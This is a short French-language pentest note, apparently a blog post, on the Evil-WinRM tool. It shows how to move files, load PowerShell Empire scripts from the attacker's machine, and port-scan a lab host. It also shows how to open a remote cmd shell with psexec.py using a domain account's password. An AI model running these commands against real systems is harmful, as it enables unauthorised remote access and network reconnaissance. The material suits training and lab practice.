Evil-WinRM

Il est possible de télécharger ou téléverser des fichiers à partir de Evil-WinRM avec les commandes upload et download

Il est possible de rendre accessible des scripts powershell qui se situent sur la machine de l’attaquant

evil-winrm -u USERNAME -p PASSWORD -i IP -s /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/
Invoke-Portscan.ps1
Get-Help Invoke-Portscan
Invoke-Portscan -Hosts 10.9.0.70 -TopPorts 50

Il existe aussi une autre façon d’obtenir un shell si nous avons le mot de passe

psexec.py searchevolution/r0cker:monmotdepasse@10.9.0.24 cmd.exe

Leave a Reply